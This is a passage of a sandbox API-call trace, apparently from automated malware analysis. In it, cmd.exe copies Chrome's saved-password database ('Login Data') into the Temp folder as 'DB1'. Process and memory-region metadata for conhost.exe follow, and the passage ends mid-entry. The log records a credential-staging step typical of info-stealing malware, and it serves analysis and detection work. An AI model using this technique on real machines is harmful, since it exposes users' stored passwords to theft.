GetProcessHeap () returned 0x440000 [0299.788] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x447b88 [0299.791] GetProcessHeap () returned 0x440000 [0299.791] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x108) returned 0x4409a8 [0299.792] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0299.829] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0299.829] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0299.829] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0299.829] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0299.829] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0299.829] GetProcessHeap () returned 0x440000 [0299.829] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x208) returned 0x440ab8 [0299.830] GetProcessHeap () returned 0x440000 [0299.830] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440ab8, Size=0x10a) returned 0x440ab8 [0299.830] GetProcessHeap () returned 0x440000 [0299.830] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440ab8) returned 0x10a [0299.830] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.830] GetProcessHeap () returned 0x440000 [0299.830] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x112) returned 0x440bd0 [0299.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd57720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0299.830] GetProcessHeap () returned 0x440000 [0299.831] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x440cf0 [0299.831] GetProcessHeap () returned 0x440000 [0299.831] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x440d28 [0299.832] GetProcessHeap () returned 0x440000 [0299.832] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x447888 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0299.832] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0299.833] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0299.834] GetProcessHeap () returned 0x440000 [0299.834] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x447888) returned 1 [0299.834] GetProcessHeap () returned 0x440000 [0299.834] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x18) returned 0x447b48 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0299.834] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0299.835] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0299.836] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.836] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0299.836] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0299.836] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0299.836] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0299.836] GetProcessHeap () returned 0x440000 [0299.836] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x447b48) returned 1 [0299.836] GetProcessHeap () returned 0x440000 [0299.836] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x208) returned 0x440d60 [0299.836] GetProcessHeap () returned 0x440000 [0299.836] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x440d60, Size=0x10a) returned 0x440d60 [0299.837] GetProcessHeap () returned 0x440000 [0299.837] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x440d60) returned 0x10a [0299.837] GetProcessHeap () returned 0x440000 [0299.837] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x440e78 [0299.837] GetProcessHeap () returned 0x440000 [0299.837] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x258) returned 0x440eb0 [0299.837] _wcsicmp (_String1="Login Data", _String2=".") returned 62 [0299.837] _wcsicmp (_String1="Login Data", _String2="..") returned 62 [0299.837] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data")) returned 0x20 [0299.838] GetProcessHeap () returned 0x440000 [0299.838] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x441110 [0299.838] GetProcessHeap () returned 0x440000 [0299.838] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x258) returned 0x44a6a8 [0299.838] _wcsicmp (_String1="DB1", _String2=".") returned 54 [0299.838] _wcsicmp (_String1="DB1", _String2="..") returned 54 [0299.838] _wcsnicmp (_String1="/V", _String2="/Y", _MaxCount=0x2) returned -3 [0299.838] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x19fa1c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19fa1c, ReturnLength=0x0) returned 0x0 [0299.838] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x19fa20, ProcessInformationLength=0x4) returned 0x0 [0299.838] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1d0000 [0299.838] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1e0000 [0299.839] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", fInfoLevelId=0x1, lpFindFileData=0x440eb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x440eb8) returned 0x441148 [0299.839] GetProcessHeap () returned 0x440000 [0299.839] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x14) returned 0x447c28 [0299.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", nBufferLength=0x104, lpBuffer=0x19ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", lpFilePart=0x0) returned 0x28 [0299.839] _wcsicmp (_String1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", _String2="con") returned -53 [0299.839] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19ef3c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xa4 [0299.839] _open_osfhandle (_OSFileHandle=0xa4, _Flags=8) returned 3 [0299.839] _get_osfhandle (_FileHandle=3) returned 0xa4 [0299.839] GetFileType (hFile=0xa4) returned 0x1 [0299.839] SetErrorMode (uMode=0x0) returned 0x8003 [0299.839] SetErrorMode (uMode=0x1) returned 0x0 [0299.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x208, lpBuffer=0x19f3e8, lpFilePart=0x19ef4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x19ef4c*="Login Data") returned 0x4e [0299.840] SetErrorMode (uMode=0x8003) returned 0x1 [0299.840] _get_osfhandle (_FileHandle=3) returned 0xa4 [0299.840] ReadFile (in: hFile=0xa4, lpBuffer=0x1d0000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19ef74, lpOverlapped=0x0 | out: lpBuffer=0x1d0000*, lpNumberOfBytesRead=0x19ef74*=0x200, lpOverlapped=0x0) returned 1 [0299.842] SetErrorMode (uMode=0x0) returned 0x8003 [0299.842] SetErrorMode (uMode=0x1) returned 0x0 [0299.842] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", nBufferLength=0x208, lpBuffer=0x19eb38, lpFilePart=0x19eb1c | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", lpFilePart=0x19eb1c*="DB1") returned 0x28 [0299.842] SetErrorMode (uMode=0x8003) returned 0x1 [0299.842] _wcsicmp (_String1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", _String2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1") returned -16 [0299.842] GetProcessHeap () returned 0x440000 [0299.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x258) returned 0x44a908 [0299.842] _wcsicmp (_String1="DB1", _String2=".") returned 54 [0299.842] _wcsicmp (_String1="DB1", _String2="..") returned 54 [0299.842] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\db1")) returned 0xffffffff [0299.843] GetLastError () returned 0x2 [0299.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", nBufferLength=0x104, lpBuffer=0x19ed38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", lpFilePart=0x0) returned 0x28 [0299.843] SetErrorMode (uMode=0x0) returned 0x8003 [0299.843] SetErrorMode (uMode=0x1) returned 0x0 [0299.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", nBufferLength=0x208, lpBuffer=0x19eb38, lpFilePart=0x19eb1c | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", lpFilePart=0x19eb1c*="DB1") returned 0x28 [0299.843] SetErrorMode (uMode=0x8003) returned 0x1 [0299.843] _wcsicmp (_String1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", _String2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1") returned -16 [0299.843] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\db1")) returned 0xffffffff [0299.844] CopyFileExW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome\\user data\\default\\login data"), lpNewFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\db1"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0xd4f440, dwCopyFlags=0x0) returned 1 [0301.897] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\db1")) returned 0x20 [0301.897] SetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", dwFileAttributes=0x20) returned 1 [0301.898] _wcsicmp (_String1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", _String2="con") returned -53 [0301.898] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\db1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x19ef3c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xa8 [0301.898] _open_osfhandle (_OSFileHandle=0xa8, _Flags=8) returned 4 [0301.898] _get_osfhandle (_FileHandle=4) returned 0xa8 [0301.898] GetFileType (hFile=0xa8) returned 0x1 [0301.898] _get_osfhandle (_FileHandle=4) returned 0xa8 [0301.898] FlushFileBuffers (hFile=0xa8) returned 1 [0301.905] _close (_FileHandle=4) returned 0 [0301.905] _wcsicmp (_String1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1", _String2="con") returned -53 [0301.905] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\db1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19ef3c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0xa8 [0301.906] _open_osfhandle (_OSFileHandle=0xa8, _Flags=8) returned 4 [0301.906] _get_osfhandle (_FileHandle=4) returned 0xa8 [0301.906] GetFileType (hFile=0xa8) returned 0x1 [0301.906] _get_osfhandle (_FileHandle=3) returned 0xa4 [0301.906] SetFilePointer (in: hFile=0xa4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0301.906] _get_osfhandle (_FileHandle=4) returned 0xa8 [0301.906] SetFilePointer (in: hFile=0xa8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0301.906] _get_osfhandle (_FileHandle=3) returned 0xa4 [0301.906] GetFileSize (in: hFile=0xa4, lpFileSizeHigh=0x19efc8 | out: lpFileSizeHigh=0x19efc8*=0x0) returned 0xa000 [0301.906] _get_osfhandle (_FileHandle=4) returned 0xa8 [0301.906] GetFileSize (in: hFile=0xa8, lpFileSizeHigh=0x19efc0 | out: lpFileSizeHigh=0x19efc0*=0x0) returned 0xa000 [0301.906] _get_osfhandle (_FileHandle=3) returned 0xa4 [0301.906] ReadFile (in: hFile=0xa4, lpBuffer=0x1d0000, nNumberOfBytesToRead=0xfe00, lpNumberOfBytesRead=0x19ef74, lpOverlapped=0x0 | out: lpBuffer=0x1d0000*, lpNumberOfBytesRead=0x19ef74*=0xa000, lpOverlapped=0x0) returned 1 [0301.918] _get_osfhandle (_FileHandle=4) returned 0xa8 [0301.918] ReadFile (in: hFile=0xa8, lpBuffer=0x1e0000, nNumberOfBytesToRead=0xa000, lpNumberOfBytesRead=0x19efc4, lpOverlapped=0x0 | out: lpBuffer=0x1e0000*, lpNumberOfBytesRead=0x19efc4*=0xa000, lpOverlapped=0x0) returned 1 [0301.918] _close (_FileHandle=4) returned 0 [0301.919] _close (_FileHandle=3) returned 0 [0301.919] FindNextFileW (in: hFindFile=0x441148, lpFindFileData=0x440eb8 | out: lpFindFileData=0x440eb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6280fa53, ftCreationTime.dwHighDateTime=0x1d70aa1, ftLastAccessTime.dwLowDateTime=0x6280fa53, ftLastAccessTime.dwHighDateTime=0x1d70aa1, ftLastWriteTime.dwLowDateTime=0x769db987, ftLastWriteTime.dwHighDateTime=0x1d70e89, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Login Data", cAlternateFileName="")) returned 0 [0301.920] GetLastError () returned 0x12 [0301.920] FindClose (in: hFindFile=0x441148 | out: hFindFile=0x441148) returned 1 [0301.922] _vsnwprintf (in: _Buffer=0xd5da10, _BufferCount=0x103, _Format="%9d", _ArgList=0x19fa0c | out: _Buffer=" 1") returned 9 [0301.922] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.922] GetFileType (hFile=0x3c) returned 0x2 [0301.922] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.922] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f968 | out: lpMode=0x19f968) returned 1 [0301.925] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x19f9b8 | out: lpConsoleScreenBufferInfo=0x19f9b8) returned 1 [0301.926] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0xd57940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0301.927] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0xd57940, nSize=0x2000, Arguments=0x19f9e8 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0301.927] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd57940*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x19f99c, lpReserved=0x0 | out: lpBuffer=0xd57940*, lpNumberOfCharsWritten=0x19f99c*=0x1b) returned 1 [0301.927] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x19fa1c, ProcessInformationLength=0x4) returned 0x0 [0301.928] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.928] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0301.928] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.928] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd4f40c | out: lpMode=0xd4f40c) returned 1 [0301.928] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.928] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd4f408 | out: lpMode=0xd4f408) returned 1 [0301.929] SetConsoleInputExeNameW () returned 0x1 [0301.929] GetConsoleOutputCP () returned 0x1b5 [0301.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd4f460 | out: lpCPInfo=0xd4f460) returned 1 [0301.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.929] exit (_Code=0) Thread: id = 114 os_tid = 0xba8 Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x49374000" os_pid = "0xd80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xd60" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17804 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17805 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17806 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 17807 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 17808 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 17809 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17810 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 17811 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 17812 start_va = 0x7ff752060000 end_va = 0x7ff752070fff monitored = 0 entry_point = 0x7ff7520616b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 17813 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17814 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 17815 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17816 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17817 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 